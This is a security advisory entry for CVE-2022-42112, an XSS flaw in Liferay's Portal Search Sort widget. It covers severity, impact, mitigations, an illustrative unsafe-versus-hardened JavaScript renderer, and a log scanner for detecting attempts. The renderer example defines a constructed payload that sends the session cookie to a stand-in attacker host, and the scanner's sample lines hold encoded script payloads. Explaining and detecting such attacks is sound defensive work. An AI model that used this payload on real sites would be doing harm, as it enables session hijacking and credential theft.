CVE-2022-42112: Cross-site scripting (XSS) in Liferay Portal and Liferay DXP (Portal Search Sort widget)
A Cross-site scripting (XSS) vulnerability in the Portal Search module's Sort widget in Liferay Portal 7.2.0 through 7.4.3.24, and Liferay DXP 7.2 before fix pack 19, 7.3 before update 5, and DXP 7.4 before update 25 allows remote attackers to inject arbitrary web script or HTML via a crafted payload.
AI Analysis
Technical Summary
CVE-2022-42112 is a Cross-site Scripting (XSS) vulnerability in the Portal Search module's Sort widget in Liferay Portal 7.2.0 through 7.4.3.24 and in Liferay DXP 7.2 before fix pack 19, 7.3 before update 5, and 7.4 before update 25. A remote attacker who holds a low-privileged account on the portal can supply a crafted value to the Sort widget that is written into the generated page without adequate neutralization, so arbitrary script or HTML is rendered in other users' browsers. The weakness is CWE-79 (improper neutralization of input during web page generation); the advisory does not state whether the injection is reflected or stored, so defenders should assume a crafted link or a persisted widget configuration could both be vectors. The CVSS v3.1 base score is 5.4 (medium), corresponding to the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N: network attack vector, low complexity, low privileges required, user interaction required, changed scope, low impact on confidentiality and integrity, and no impact on availability. Successful exploitation runs attacker script in the victim's session context, which can lead to session hijacking, credential theft, or actions performed on the victim's behalf inside the portal. No exploitation in the wild is reported, and the data carries no patch links, though fixed releases exist in the versions named above. The need for an authenticated account and for a victim to interact with the widget narrows the attack surface, but self-registration, partner access, or a single compromised credential is enough to satisfy the privilege requirement on many deployments.
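The CWE-79 pattern described above, shown as an added illustration in JavaScript rather than Liferay's own code: a toy sort widget renders a request parameter into markup, first by plain string concatenation and then hardened with an allowlist of sort fields plus HTML entity encoding. The parameter name `sortField`, the list of fields, and the payload are assumptions constructed for the example and are not taken from the advisory.

```javascript
// Added example (not Liferay code): a toy "sort widget" that renders a
// user-supplied sort field into HTML, first unsafely and then hardened.
// The parameter name "sortField" and the field list are assumptions.

// Sort fields the widget legitimately supports (assumed for the example).
const ALLOWED_SORT_FIELDS = new Map([
  ["modified", "Modified date"],
  ["created", "Created date"],
  ["title", "Title"],
]);

// Minimal HTML entity encoder, adequate for text nodes and double-quoted attributes.
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// CWE-79 pattern: the request parameter is concatenated straight into markup,
// both inside an attribute value and as a text node.
function renderSortOptionUnsafe(sortField) {
  return `<li class="sort-option" data-field="${sortField}">Sort by ${sortField}</li>`;
}

// Hardened: reject anything not on the allowlist, then encode everything rendered.
// The allowlist is the primary control; encoding is defence in depth.
function renderSortOptionSafe(sortField) {
  const label = ALLOWED_SORT_FIELDS.get(sortField);
  if (label === undefined) {
    throw new Error(`unsupported sort field: ${htmlEscape(sortField)}`);
  }
  return `<li class="sort-option" data-field="${htmlEscape(sortField)}">Sort by ${htmlEscape(label)}</li>`;
}

// Constructed attacker payload: closes the attribute, then injects a script
// that exfiltrates the session cookie to an attacker-controlled host.
const PAYLOAD = `"><script>fetch("https://attacker.example/?c="+document.cookie)</script>`;

// Runs both renderers against the payload and a legitimate value.
function demo() {
  const unsafe = renderSortOptionUnsafe(PAYLOAD);
  let safe;
  try {
    safe = renderSortOptionSafe(PAYLOAD);
  } catch (e) {
    safe = `rejected: ${e.message}`;
  }
  return { unsafe, safe, safeValid: renderSortOptionSafe("modified") };
}

const result = demo();
console.log("unsafe   :", result.unsafe);
console.log("hardened :", result.safe);
console.log("valid    :", result.safeValid);
```

The unsafe renderer emits the literal `<script>` element; the hardened one refuses the value outright and, even in the error message, only ever emits the entity-encoded form. Note that a session cookie marked `HttpOnly` would blunt this particular payload, but not an attacker who instead drives authenticated requests from within the page.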
Potential Impact
For European organizations using Liferay Portal or Liferay DXP within the affected versions, this vulnerability poses a risk primarily to the confidentiality and integrity of user data and sessions. Since Liferay is widely used for enterprise portals, intranets, and customer-facing web applications, exploitation could lead to unauthorized access to sensitive information, session hijacking, or manipulation of portal content. This could result in data breaches, loss of user trust, and compliance issues under GDPR due to exposure of personal data. The requirement for authenticated access reduces the risk of widespread exploitation but does not eliminate it, especially in organizations with large user bases or where user credentials may be compromised. Attackers could leverage this vulnerability to target internal users or partners, potentially escalating attacks within the network. The medium severity score reflects moderate risk, but the impact on confidentiality and integrity in regulated European sectors such as finance, healthcare, and government could be significant.
Mitigation Recommendations
European organizations should prioritize upgrading affected installations to a fixed release: Liferay Portal 7.4.3.25 or later, and Liferay DXP 7.2 fix pack 19, 7.3 update 5, or 7.4 update 25 and later. Because the flaw sits in vendor-shipped widget code, operators cannot meaningfully "add output encoding" themselves; where patching must wait, the practical interim steps are to remove the Portal Search Sort widget from pages where it is not needed and to restrict, through Liferay's role and permission model, which users can view or configure the search widgets. A Content Security Policy that disallows inline script and restricts script sources reduces the impact of any XSS, but portal pages commonly depend on inline scripts, so roll CSP out in report-only mode first and review the violation reports before enforcing it. Set the session cookie as HttpOnly and Secure so that the simplest cookie-theft payloads fail. Review user provisioning (self-registration, partner and contractor accounts) to keep the number of authenticated users who can reach the search pages small, and enforce strong authentication so that a single compromised credential does not satisfy the privilege requirement. In web-server and portal access logs, watch for angle brackets, `script` fragments, `javascript:` URIs, or `on*=` event handlers in the sort and ordering parameters of search requests, including in URL-encoded and double-encoded form, and treat such requests from an authenticated account as a likely exploitation attempt. Finally, user awareness training about phishing reduces the chance that a victim follows the crafted link or interaction the attack needs.
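To make the monitoring recommendation concrete, an added example (not from the advisory or from Liferay) that scans access-log lines for script-injection payloads in sort-related query parameters, after URL decoding, with a second decode pass so double-encoded payloads are not missed. The parameter names `sortField`, `orderByCol` and `orderByType`, the Common Log Format layout, and the sample lines are all assumptions constructed for the example; substitute the parameter names you actually observe in your portal's search requests.

```javascript
// Added example (not Liferay code): flag XSS-style payloads in sort-related
// query parameters of access-log lines. Parameter names, log format and the
// sample lines below are assumptions constructed for the example.

// Query parameters worth inspecting (assumed names).
const SUSPECT_PARAMS = new Set(["sortField", "orderByCol", "orderByType"]);

// Indicators of script injection, tested on the decoded value.
const XSS_PATTERNS = [
  /<\s*\/?\s*(script|img|svg|iframe|object|embed)\b/i, // injected elements
  /\bon[a-z]+\s*=/i,                                    // onerror=, onmouseover=, ...
  /javascript\s*:/i,                                    // javascript: URIs
  /&lt;\s*script/i,                                     // entity-encoded <script
];

// decodeURIComponent that tolerates malformed sequences instead of throwing.
function safeDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch {
    return s;
  }
}

// Parse one Common Log Format line; returns null when the line does not match.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/);
  if (!m) return null;
  const [, ip, user, ts, method, target, status] = m;
  const q = target.indexOf("?");
  // URLSearchParams performs the first URL-decoding pass.
  const params = new URLSearchParams(q === -1 ? "" : target.slice(q + 1));
  return { ip, user, ts, method, path: q === -1 ? target : target.slice(0, q), status, params };
}

// Returns one hit per suspicious parameter value, with enough context to triage.
function findXssAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    for (const [name, value] of req.params) {
      if (!SUSPECT_PARAMS.has(name)) continue;
      const decoded = safeDecode(value); // second pass catches double-encoding
      const matched = XSS_PATTERNS.find((re) => re.test(value) || re.test(decoded));
      if (matched) {
        hits.push({ ip: req.ip, user: req.user, ts: req.ts, path: req.path,
                    param: name, value: decoded, pattern: matched.source });
      }
    }
  }
  return hits;
}

// Constructed sample log lines (not real traffic). Line 2 carries a
// single-encoded <script> payload; line 3 a double-encoded event handler.
const SAMPLE_LOG = [
  '10.0.0.5 - alice [01/Nov/2022:10:00:01 +0100] "GET /web/guest/search?q=report&sortField=modified HTTP/1.1" 200 5120',
  '10.0.0.9 - bob [01/Nov/2022:10:02:17 +0100] "GET /web/guest/search?q=report&sortField=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5200',
  '10.0.0.9 - bob [01/Nov/2022:10:02:40 +0100] "GET /web/guest/search?q=x&orderByCol=title%2522%2520onmouseover%253Dalert(1) HTTP/1.1" 200 5200',
  '10.0.0.7 - carol [01/Nov/2022:10:03:00 +0100] "GET /web/guest/search?q=budget&sortField=created&orderByType=desc HTTP/1.1" 200 5100',
];

for (const hit of findXssAttempts(SAMPLE_LOG)) {
  console.log(`${hit.ts} ${hit.ip} user=${hit.user} ${hit.param}=${JSON.stringify(hit.value)} matched /${hit.pattern}/`);
}
```

The scan deliberately keys on the parameter names rather than on every query string, so the output is small enough to review; a hit from an authenticated user on a known-vulnerable version is a credible exploitation attempt and should be correlated with that account's other activity.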
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2022-10-03T00:00:00.000Z
- Cisa Enriched: true
- Cvss Version: 3.1
- State: PUBLISHED
Threat ID: 682d9817c4522896dcbd72a2
Added to database: 5/21/2025, 9:08:39 AM
Last enriched: 7/4/2025, 11:24:47 PM
Last updated: 2/7/2026, 11:03:12 AM